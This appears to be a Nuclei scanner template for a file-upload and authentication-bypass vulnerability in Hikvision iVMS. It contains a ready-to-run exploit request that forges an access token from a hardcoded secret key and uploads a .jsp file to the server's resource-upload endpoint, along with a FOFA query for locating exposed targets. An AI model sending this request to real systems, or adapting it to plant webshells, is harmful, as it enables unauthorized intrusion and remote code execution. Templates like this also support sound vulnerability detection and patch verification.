id: hikvision-ivms-file-upload-bypass info: name: Hikvison iVMS - File Upload Bypass author: SleepingBag945 severity: critical description: Hikvision iVMS integrated security system has a vulnerability that allows arbitrary file uploads. Attackers can exploit this vulnerability by obtaining the encryption key to create a forged token. By using the forged token, they can make requests to the "/resourceOperations/upload" interface to upload files of their choice. This can lead to gaining unauthorized webshell access on the server, enabling remote execution of malicious code. reference: - https://blog.csdn.net/qq_41904294/article/details/130807691 metadata: verified: true max-request: 1 fofa-query: icon_hash="-911494769" tags: hikvision,ivms,intrusive,fileupload,auth-bypass http: - raw: - | POST /eps/api/resourceOperations/upload?token={{to_upper(md5(concat("{{RootURL}}","/eps/api/resourceOperations/uploadsecretKeyIbuilding")))}} HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPo ------WebKitFormBoundaryGEJwiloiPo Content-Disposition: form-data; name="fileUploader";filename="{{randstr}}.jsp" Content-Type: image/jpeg {{randstr}} ------WebKitFormBoundaryGEJwiloiPo%20 matchers: - type: word part: body words: - '"success":true' - '"resourceName":' condition: and # digest: 490a00463044022063f41bfa89c634aa9271cd12a8e97f526188d4fcb0102d9ce91c630d0d32e7fc02201cd682c8e83522c4064155836911e725b3537cabf728f97d8899d92b72e404e9:922c64590222798bb761d5b6d8e72950